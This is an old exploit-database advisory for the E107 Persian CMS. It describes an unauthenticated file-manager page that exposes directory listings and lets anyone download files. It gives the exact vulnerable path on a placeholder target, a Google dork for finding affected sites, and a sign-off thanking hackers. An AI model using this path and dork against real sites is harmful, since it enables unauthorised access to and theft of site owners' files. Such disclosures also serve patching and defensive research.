E107 Persian Directory Traversal & Arbitrary File Download



EKU-ID: 1062 CVE: OSVDB-ID:
Author: St493r Published: 2011-09-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Author   : St493r
[#] Contact  : St493r@gmail.com
[#] Title    : E107 Persian  Directory Traversal & Arbitrary File Download
[#] Vendor   : http://e107.com
[#] Software : http://e107.ir/files/downloads/e107_7.25_ir.zip
[#] Date     : 28 - 09 - 2011
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Vulnerability File : /handlers/tiny_mce/plugins/filemanager/pages/fm/index.html

Go to this above link ,
Example : http://TARGET/handlers/tiny_mce/plugins/filemanager/pages/fm/index.html
Now you can see all directories and files of target , also you can download
files from left menu , and more option that you can see them above

Google dork : Powered By E107 Persian

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Thanks To All Iranian Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++